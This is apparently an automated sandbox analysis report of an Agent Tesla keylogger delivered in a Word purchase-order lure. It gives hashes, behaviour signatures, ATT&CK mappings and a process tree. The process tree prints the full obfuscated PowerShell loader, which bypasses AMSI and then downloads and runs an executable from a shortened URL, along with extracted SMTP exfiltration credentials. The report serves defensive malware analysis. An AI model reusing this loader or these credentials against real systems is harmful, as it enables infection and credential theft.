agenttesla | de1ec15823c3d7078339d1211ffeafd491e23c409d8d55dcc25c552beb9d3c5b

General

Target

ABSURY CHINA PO#200929H3246.doc
Size

137KB
MD5

ac33ee5032e398b9c27377762e1f7f17
SHA1

56089cc1a763cf6a078babee414ff6b9ab522a8a
SHA256

de1ec15823c3d7078339d1211ffeafd491e23c409d8d55dcc25c552beb9d3c5b
SHA512

4e883ecf884c46686dcd8ffa4392a1b549b0d3d4bbea9c3c07a9a421546168724da2e9b98030aed1bb99c6dee5f8cd8ae075bac4e14126bc7b7d1a61b3afde51

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bit.ly/3cnqYgk

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.rdnsanom.xyz
Port:
587
Username:
[email protected]
Password:
O?qr3+lOv9j_

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	200	648	powershell.exe	WINWORD.EXE

AgentTesla Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3184-25-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla
behavioral2/memory/3184-26-0x000000000043746E-mapping.dmp	family_agenttesla

Beds Protector Packer 1 IoCs

Detects Beds Protector packer used to load .NET malware.

Processes:

resource	yara_rule
behavioral2/memory/2556-22-0x0000000005830000-0x0000000005AA0000-memory.dmp	beds_protector

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

14 200 powershell.exe
16 200 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

mznfchhemyw.exemznfchhemyw.exe

pid process

2556 mznfchhemyw.exe
3184 mznfchhemyw.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Suspicious use of SetThreadContext 1 IoCs

Processes:

mznfchhemyw.exe

description pid process target process

PID 2556 set thread context of 3184 2556 mznfchhemyw.exe mznfchhemyw.exe

flow	pid	process
14	200	powershell.exe
16	200	powershell.exe

pid	process
2556	mznfchhemyw.exe
3184	mznfchhemyw.exe

description	pid	process	target process
PID 2556 set thread context of 3184	2556	mznfchhemyw.exe	mznfchhemyw.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

648 WINWORD.EXE
648 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exemznfchhemyw.exe

pid process

200 powershell.exe
200 powershell.exe
200 powershell.exe
3184 mznfchhemyw.exe
3184 mznfchhemyw.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

WINWORD.EXE

pid process

648 WINWORD.EXE
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exemznfchhemyw.exe

description pid process

Token: SeDebugPrivilege 200 powershell.exe
Token: SeDebugPrivilege 3184 mznfchhemyw.exe

pid	process
200	powershell.exe
200	powershell.exe
200	powershell.exe
3184	mznfchhemyw.exe
3184	mznfchhemyw.exe

description	pid	process
Token: SeDebugPrivilege	200	powershell.exe
Token: SeDebugPrivilege	3184	mznfchhemyw.exe

Suspicious use of SetWindowsHookEx 17 IoCs

Processes:

WINWORD.EXE

pid	process
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE
648	WINWORD.EXE

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

WINWORD.EXEpowershell.exemznfchhemyw.exe

description	pid	process	target process
PID 648 wrote to memory of 200	648	WINWORD.EXE	powershell.exe
PID 648 wrote to memory of 200	648	WINWORD.EXE	powershell.exe
PID 200 wrote to memory of 2556	200	powershell.exe	mznfchhemyw.exe
PID 200 wrote to memory of 2556	200	powershell.exe	mznfchhemyw.exe
PID 200 wrote to memory of 2556	200	powershell.exe	mznfchhemyw.exe
PID 2556 wrote to memory of 3184	2556	mznfchhemyw.exe	mznfchhemyw.exe
PID 2556 wrote to memory of 3184	2556	mznfchhemyw.exe	mznfchhemyw.exe
PID 2556 wrote to memory of 3184	2556	mznfchhemyw.exe	mznfchhemyw.exe
PID 2556 wrote to memory of 3184	2556	mznfchhemyw.exe	mznfchhemyw.exe
PID 2556 wrote to memory of 3184	2556	mznfchhemyw.exe	mznfchhemyw.exe
PID 2556 wrote to memory of 3184	2556	mznfchhemyw.exe	mznfchhemyw.exe
PID 2556 wrote to memory of 3184	2556	mznfchhemyw.exe	mznfchhemyw.exe
PID 2556 wrote to memory of 3184	2556	mznfchhemyw.exe	mznfchhemyw.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ABSURY CHINA PO#200929H3246.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $sSIlTYNjhraqEeSxwG=@(91,100,111,117,98,108,101,93,36,111,115,118,101,114,32,61,32,91,115,116,114,105,110,103,93,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,97,106,111,114,32,43,32,39,46,39,32,43,32,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,105,110,111,114,59,105,102,32,40,36,111,115,118,101,114,32,45,103,101,32,49,48,46,48,41,32,123,101,99,104,111,32,87,105,110,100,111,119,115,49,48,59,36,84,81,78,61,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,65,108,108,111,99,72,71,108,111,98,97,108,40,40,49,50,52,55,48,45,51,51,57,52,41,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,99,72,65,82,93,40,91,66,121,116,101,93,48,120,52,49,41,43,91,99,72,97,82,93,40,91,66,89,84,69,93,48,120,54,68,41,43,91,67,72,97,114,93,40,91,98,89,84,69,93,48,120,55,51,41,43,91,67,104,65,114,93,40,91,98,121,116,69,93,48,120,54,57,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,67,72,97,82,93,40,91,98,89,116,101,93,48,120,54,49,41,43,91,67,104,97,82,93,40,91,98,89,84,101,93,48,120,54,68,41,43,91,67,104,97,82,93,40,49,52,56,45,51,51,41,43,91,99,72,65,114,93,40,49,48,53,41,41,83,101,115,115,105,111,110,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,36,110,117,108,108,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,99,72,65,82,93,40,91,66,121,116,101,93,48,120,52,49,41,43,91,99,72,97,82,93,40,91,66,89,84,69,93,48,120,54,68,41,43,91,67,72,97,114,93,40,91,98,89,84,69,93,48,120,55,51,41,43,91,67,104,65,114,93,40,91,98,121,116,69,93,48,120,54,57,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,67,72,97,82,93,40,91,98,89,116,101,93,48,120,54,49,41,43,91,67,104,97,82,93,40,91,98,89,84,101,93,48,120,54,68,41,43,91,67,104,97,82,93,40,49,52,56,45,51,51,41,43,91,99,72,65,114,93,40,49,48,53,41,41,67,111,110,116,101,120,116,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,91,73,110,116,80,116,114,93,36,84,81,78,41,59,125,101,108,115,101,32,123,125,59,36,99,108,105,101,110,116,32,61,32,110,101,119,45,111,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,59,36,97,32,61,32,39,104,116,116,112,115,58,47,47,98,105,116,46,108,121,47,51,99,110,113,89,103,107,39,46,83,112,108,105,116,40,39,44,39,41,59,36,104,117,97,115,32,61,32,36,101,110,118,58,116,101,109,112,32,43,32,39,92,109,122,110,102,99,104,104,101,109,121,119,46,101,120,101,39,59,102,111,114,101,97,99,104,40,36,98,32,105,110,32,36,97,41,123,116,114,121,123,36,99,108,105,101,110,116,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,98,46,84,111,83,116,114,105,110,103,40,41,44,32,36,104,117,97,115,41,59,73,110,118,111,107,101,45,73,116,101,109,40,36,104,117,97,115,41,59,98,114,101,97,107,59,125,99,97,116,99,104,123,119,114,105,116,101,45,104,111,115,116,32,36,95,46,69,120,99,101,112,116,105,111,110,46,77,101,115,115,97,103,101,125,125,59);[System.Text.Encoding]::ASCII.GetString($sSIlTYNjhraqEeSxwG)|&('I'+'EX');
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:200

C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe
"C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2556

C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe
"C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3184

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

3

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Data from Local System

3

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe
MD5
63332ea9e6fd6bfc2275a0bc7887e406

SHA1
5acd50123e20554be8a9bbd16d4cc367bb7ab81b

SHA256
c47d08441b68cd06b3d2f09c22891f4ec1b9953ec735e3fb82a6e55543bb4db2

SHA512
91f30a309b1cb9499263269bca87bfdf816e063dfde5ca9bb190665029add4c6eb8d1a1968a80bf5fcf118386034ad91cb0288295865bef5e15aa850c16a71a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe
MD5
63332ea9e6fd6bfc2275a0bc7887e406

SHA1
5acd50123e20554be8a9bbd16d4cc367bb7ab81b

SHA256
c47d08441b68cd06b3d2f09c22891f4ec1b9953ec735e3fb82a6e55543bb4db2

SHA512
91f30a309b1cb9499263269bca87bfdf816e063dfde5ca9bb190665029add4c6eb8d1a1968a80bf5fcf118386034ad91cb0288295865bef5e15aa850c16a71a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe
MD5
63332ea9e6fd6bfc2275a0bc7887e406

SHA1
5acd50123e20554be8a9bbd16d4cc367bb7ab81b

SHA256
c47d08441b68cd06b3d2f09c22891f4ec1b9953ec735e3fb82a6e55543bb4db2

SHA512
91f30a309b1cb9499263269bca87bfdf816e063dfde5ca9bb190665029add4c6eb8d1a1968a80bf5fcf118386034ad91cb0288295865bef5e15aa850c16a71a2

Download Submit
memory/200-9-0x0000026CC4D90000-0x0000026CC4D92000-memory.dmp

Filesize
8KB

Download
memory/200-7-0x0000000000000000-mapping.dmp

Download
memory/200-8-0x00007FF8454F0000-0x00007FF845EDC000-memory.dmp

Filesize
9.9MB

Download
memory/200-10-0x0000026CC4D93000-0x0000026CC4D95000-memory.dmp

Filesize
8KB

Download
memory/200-11-0x0000026CC6760000-0x0000026CC6761000-memory.dmp

Filesize
4KB

Download
memory/200-12-0x0000026CDED70000-0x0000026CDED71000-memory.dmp

Filesize
4KB

Download
memory/200-13-0x0000026CC4D96000-0x0000026CC4D98000-memory.dmp

Filesize
8KB

Download
memory/648-6-0x00007FF82D760000-0x00007FF82D770000-memory.dmp

Filesize
64KB

Download
memory/648-2-0x00007FF82D760000-0x00007FF82D770000-memory.dmp

Filesize
64KB

Download
memory/648-3-0x00007FF82D760000-0x00007FF82D770000-memory.dmp

Filesize
64KB

Download
memory/648-5-0x000002AE3ED50000-0x000002AE3F387000-memory.dmp

Filesize
6.2MB

Download
memory/648-4-0x00007FF82D760000-0x00007FF82D770000-memory.dmp

Filesize
64KB

Download
memory/2556-18-0x0000000000C20000-0x0000000000C21000-memory.dmp

Filesize
4KB

Download
memory/2556-14-0x0000000000000000-mapping.dmp

Download
memory/2556-20-0x0000000005D30000-0x0000000005D31000-memory.dmp

Filesize
4KB

Download
memory/2556-21-0x0000000005700000-0x0000000005701000-memory.dmp

Filesize
4KB

Download
memory/2556-22-0x0000000005830000-0x0000000005AA0000-memory.dmp

Filesize
2.4MB

Download
memory/2556-23-0x0000000005B40000-0x0000000005B41000-memory.dmp

Filesize
4KB

Download
memory/2556-24-0x00000000057E0000-0x00000000057EF000-memory.dmp

Filesize
60KB

Download
memory/2556-17-0x0000000073FF0000-0x00000000746DE000-memory.dmp

Filesize
6.9MB

Download
memory/2556-27-0x00000000057F0000-0x00000000057F1000-memory.dmp

Filesize
4KB

Download
memory/3184-26-0x000000000043746E-mapping.dmp

Download
memory/3184-25-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/3184-29-0x0000000073FF0000-0x00000000746DE000-memory.dmp

Filesize
6.9MB

Download
memory/3184-34-0x0000000005200000-0x0000000005201000-memory.dmp

Filesize
4KB

Download
memory/3184-35-0x0000000005520000-0x0000000005521000-memory.dmp

Filesize
4KB

Download
memory/3184-36-0x0000000005BB0000-0x0000000005BB1000-memory.dmp

Filesize
4KB

Download
memory/3184-38-0x00000000007B0000-0x00000000007B1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads